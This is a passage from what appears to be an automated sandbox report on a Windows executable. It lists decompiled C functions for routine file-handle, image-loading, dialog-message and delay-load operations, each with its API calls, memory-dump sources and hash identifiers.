                                              • Part of subcall function 00C3AD1B: __EH_prolog.LIBCMT ref: 00C3AD20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID:
                                            • API String ID: 3519838083-0
                                            • Opcode ID: 9d548b6d07163c3bee233dd9f19489c8da5a7a777940d46ddc8d5a2076644948
                                            • Instruction ID: a4f2c4a0618a68f2d790560206f5d6f0dea68f1e65a3893b53e612e76174f363
                                            • Opcode Fuzzy Hash: 9d548b6d07163c3bee233dd9f19489c8da5a7a777940d46ddc8d5a2076644948
                                            • Instruction Fuzzy Hash: E0018170A29684DAD715E7A4C1153EEB7A49F25315F00099DE44E53382CBB82B05F7A3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C394DA, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00C394DA(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E00C36C7B(0xc700e0, _t21 + 0x1e);
				}
				return _t16;
			}





                                            0x00c394dc
                                            0x00c394de
                                            0x00c394e4
                                            0x00c394ea
                                            0x00c394fb
                                            0x00c39500
                                            0x00c39502
                                            0x00c39502
                                            0x00c39504
                                            0x00c39504
                                            0x00c39508
                                            0x00c3950e
                                            0x00c3951e
                                            0x00c3951e
                                            0x00c39527

                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00C394AA), ref: 00C394F5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: ea2026d04582d64fa210365f76ed7123e663b1f6e11e7713af5e9949f2caea01
                                            • Instruction ID: dbde2bfa2786bac7efd772ddce6b247fb71e6a83bdb5b96aa5fa787b5eef2f14
                                            • Opcode Fuzzy Hash: ea2026d04582d64fa210365f76ed7123e663b1f6e11e7713af5e9949f2caea01
                                            • Instruction Fuzzy Hash: 7EF082B0462B049EDB318A24D5497D2B7E8DB12735F048B1ED0F7435E0D3B16A8DDB11
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3A1B1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C3A1B1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E00C3B5E5(_a4) == 0) {
					_t12 = E00C3A2DF(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00C39ECD( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E00C39EE5( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}





                                            0x00c3a1b2
                                            0x00c3a1ba
                                            0x00c3a1c8
                                            0x00c3a1d5
                                            0x00c3a1dd
                                            0x00000000
                                            0x00000000
                                            0x00c3a1e0
                                            0x00c3a1ec
                                            0x00c3a1fe
                                            0x00c3a209
                                            0x00000000
                                            0x00c3a20f
                                            0x00c3a1ca
                                            0x00000000

                                            APIs
                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C3A1E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: 265e524c313bdc52c68007e28d3749bcac27fb05edf94aa768a74a63f3c67b93
                                            • Instruction ID: fafb66f5eea6b97614cf259558138c2132227e205aff33786848d1d4b9eba219
                                            • Opcode Fuzzy Hash: 265e524c313bdc52c68007e28d3749bcac27fb05edf94aa768a74a63f3c67b93
                                            • Instruction Fuzzy Hash: 5CF08231028780AACA226BB44804BCBBB916F16331F048A4DF1FD12192C6B654A5EB22
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C402E8, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00C402E8() {
				void* __esi;
				void* _t2;

				E00C40FAF(); // executed
				_t2 = E00C40FB4();
				if(_t2 != 0) {
					_t2 = E00C36CC9(_t2, 0xc700e0, 0xff, 0xff);
				}
				if( *0xc700eb != 0) {
					_t2 = E00C36CC9(_t2, 0xc700e0, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





                                            0x00c402ea
                                            0x00c402ef
                                            0x00c40300
                                            0x00c40305
                                            0x00c40305
                                            0x00c40311
                                            0x00c40316
                                            0x00c40316
                                            0x00c4031d
                                            0x00c40325

                                            APIs
                                            • SetThreadExecutionState.KERNEL32 ref: 00C4031D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExecutionStateThread
                                            • String ID:
                                            • API String ID: 2211380416-0
                                            • Opcode ID: a427ff7f1c23732222bb4acb23a2c822f0797a5c3b260addcf5d45fba66960f4
                                            • Instruction ID: 22f131950cc584ef269ec2021c5060f4d22f2e9e36b1d58889a331371523a834
                                            • Opcode Fuzzy Hash: a427ff7f1c23732222bb4acb23a2c822f0797a5c3b260addcf5d45fba66960f4
                                            • Instruction Fuzzy Hash: 40D02B2065015062EB21376C38057FE0A1A6FC1360F284079F249663D3CA65088FB3A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C495CF, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00C495CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00C4D7F6();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00C4938E(__eax, _a4, _a8); // executed
				return _t6;
			}





                                            0x00c495d2
                                            0x00c495d3
                                            0x00c495d5
                                            0x00c495da
                                            0x00c495df
                                            0x00000000
                                            0x00c495f0
                                            0x00c495e9
                                            0x00000000

                                            APIs
                                            • GdipAlloc.GDIPLUS(00000010), ref: 00C495D5
                                              • Part of subcall function 00C4938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C493AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                            • String ID:
                                            • API String ID: 1915507550-0
                                            • Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                                            • Instruction ID: a5bd2a67b8a3c4374eff8f1fad28665f3199275df52b951af6da0b57971ea385
                                            • Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                                            • Instruction Fuzzy Hash: 35D05E302041196B9B51BA759C02B6B7A98FB00310F104125BC0685151F971DA10A292
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39745, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C39745(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}




                                            0x00c39749
                                            0x00c39751
                                            0x00c3975a
                                            0x00c39767
                                            0x00c39761
                                            0x00c39763
                                            0x00c39763
                                            0x00c3974b
                                            0x00c3974d
                                            0x00c3974d

                                            APIs
                                            • GetFileType.KERNELBASE(000000FF,00C39683), ref: 00C39751
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileType
                                            • String ID:
                                            • API String ID: 3081899298-0
                                            • Opcode ID: 62fe432791dc206f851f77c681dd63e795a86c4f4c2a65c3c09a47ec7090431f
                                            • Instruction ID: 309aa8710a058c8f4f24b4e48621e8421b1bd30280a6d16177f736c8bd46885c
                                            • Opcode Fuzzy Hash: 62fe432791dc206f851f77c681dd63e795a86c4f4c2a65c3c09a47ec7090431f
                                            • Instruction Fuzzy Hash: F8D0123003160095CF311E384E490596655DF43366F38C6A4D035C40F1C772C903F500
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4C9FE, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4C9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xc775c8, 0x6a, 0x402, E00C3F749(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00C4A388(); // executed
				return _t7;
			}




                                            0x00c4ca23
                                            0x00c4ca29
                                            0x00c4ca2e

                                            APIs
                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00C4CA23
                                              • Part of subcall function 00C4A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C4A399
                                              • Part of subcall function 00C4A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C4A3AA
                                              • Part of subcall function 00C4A388: IsDialogMessageW.USER32(001C0078,?), ref: 00C4A3BE
                                              • Part of subcall function 00C4A388: TranslateMessage.USER32(?), ref: 00C4A3CC
                                              • Part of subcall function 00C4A388: DispatchMessageW.USER32(?), ref: 00C4A3D6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                            • String ID:
                                            • API String ID: 897784432-0
                                            • Opcode ID: 10e3b078f9fc1bead4be12471c56f4ec5cafd1c81be7f1979bfb8a9b7c68be78
                                            • Instruction ID: aac18ef4a0a70cc7b1c9b1efb82fc71d70132db0c3ce0f81323c68a0af4bddb9
                                            • Opcode Fuzzy Hash: 10e3b078f9fc1bead4be12471c56f4ec5cafd1c81be7f1979bfb8a9b7c68be78
                                            • Instruction Fuzzy Hash: 30D09E35158300AAD7112B51CE06F0E7AF2BB8CB44F004558B345740B18662DD21AB12
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D1C9, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C4D1C9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00C4D53A(_t3, _t4, _t8, _t9, _t10, 0xc6ab6c, 0xc6df0c); // executed
				goto __eax;
			}








                                            0x00c4d1ae
                                            0x00c4d1b6
                                            0x00c4d1bd

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D1B6
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: e0b19b1ea3a6c2587e62b4395bec738770bf283c820c4546582d3f65349d4754
                                            • Instruction ID: ba371a3d7b4097bf842b3d928c69b6db0efc050b2dd71819ed969f995a31d095
                                            • Opcode Fuzzy Hash: e0b19b1ea3a6c2587e62b4395bec738770bf283c820c4546582d3f65349d4754
                                            • Instruction Fuzzy Hash: 53B012E2758000AD391471456C82C3A031CE0C0B24330C06AFC07C1140D8405C001033
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D1DD, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C4D1DD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00C4D53A(_t3, _t4, _t8, _t9, _t10, 0xc6ab6c, 0xc6df04); // executed
				goto __eax;
			}








                                            0x00c4d1ae
                                            0x00c4d1b6
                                            0x00c4d1bd

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D1B6
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 51cc687b6fb74995d929be7610e8ac5d661f1490626d6ed07cc731c3b57825c6
                                            • Instruction ID: 41c8ae88422d02583a4dcd998144d7e0578f4b96e343b6a42cec255c9d86215a
                                            • Opcode Fuzzy Hash: 51cc687b6fb74995d929be7610e8ac5d661f1490626d6ed07cc731c3b57825c6
                                            • Instruction Fuzzy Hash: 04B012E2758000AD391471456D82C3A020CE0C4B24330806AF807C1140D8415C011033
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D1A4, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C4D1A4() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00C4D53A(_t3, _t4, _t8, _t9, _t10, 0xc6ab6c, 0xc6df08); // executed
				goto __eax;
			}








                                            0x00c4d1ae
                                            0x00c4d1b6
                                            0x00c4d1bd

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D1B6
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 456699d32ca35b454c556c7b805906d920ba0b07b40d55eca4679018ffa84866
                                            • Instruction ID: c45c1043466cf999464b552d5c44e174244065a088e11eb4e614d76e139c1d5b
                                            • Opcode Fuzzy Hash: 456699d32ca35b454c556c7b805906d920ba0b07b40d55eca4679018ffa84866
                                            • Instruction Fuzzy Hash: 51B012E2798104BD39143141ED82C3A020DE1C0B24330816AF803D008098405C401033
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D1BF, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C4D1BF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00C4D53A(_t3, _t4, _t8, _t9, _t10, 0xc6ab6c, 0xc6df10); // executed
				goto __eax;
			}








                                            0x00c4d1ae
                                            0x00c4d1b6
                                            0x00c4d1bd

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D1B6
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 6f4973158856710dffb9577627a48850a65b4a83efcbd6da114caf6cd65c0446
                                            • Instruction ID: 80aff569e50c8fa5764261d1a4ff9260cc84bb7f64488e93aad142f7d0338a52
                                            • Opcode Fuzzy Hash: 6f4973158856710dffb9577627a48850a65b4a83efcbd6da114caf6cd65c0446
                                            • Instruction Fuzzy Hash: F9B012E2758000AD392471466C82C3A020CF0C0B24330846AF807C0188D8805C001033
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D205, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C4D205() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00C4D53A(_t3, _t4, _t8, _t9, _t10, 0xc6ab8c, 0xc6dff8); // executed
				goto __eax;
			}








                                            0x00c4d20f
                                            0x00c4d217
                                            0x00c4d21e

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D217
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 195a3061a7fabd4bf6c1bf162bcc4dcb2770896521872383f00506798c52dc75
                                            • Instruction ID: 31b9f1db55eba723f29c44511e505cd98a2de75d2483839a3571a799179609c0
                                            • Opcode Fuzzy Hash: 195a3061a7fabd4bf6c1bf162bcc4dcb2770896521872383f00506798c52dc75
                                            • Instruction Fuzzy Hash: 52B012D5398100BD312931866C42C36031CF1C0F28330C22BF013D008498809C401033
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D234, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C4D234() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00C4D53A(_t3, _t4, _t8, _t9, _t10, 0xc6ab8c, 0xc6dffc); // executed
				goto __eax;
			}








                                            0x00c4d20f
                                            0x00c4d217
                                            0x00c4d21e

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D217
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: a693a4a1ce3e896df17c1d43b3949954384813768e40d5623af513772a6fe35b
                                            • Instruction ID: 320ce87a481feed1cefcf89d597548a9f97802d7c8404d2f3ab164075ca635c9
                                            • Opcode Fuzzy Hash: a693a4a1ce3e896df17c1d43b3949954384813768e40d5623af513772a6fe35b
                                            • Instruction Fuzzy Hash: B5B012D5398000AD312971896C82D36031CF0C0B28330C12BF407C1040D8809C001033
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D23E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C4D23E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00C4D53A(_t3, _t4, _t8, _t9, _t10, 0xc6ab8c, 0xc6dff0); // executed
				goto __eax;
			}








                                            0x00c4d20f
                                            0x00c4d217
                                            0x00c4d21e

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D217
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: f4b05451a24891b934b2ff6f285e1fc059242c5c37cdbb2d41836326c6d0d7b7
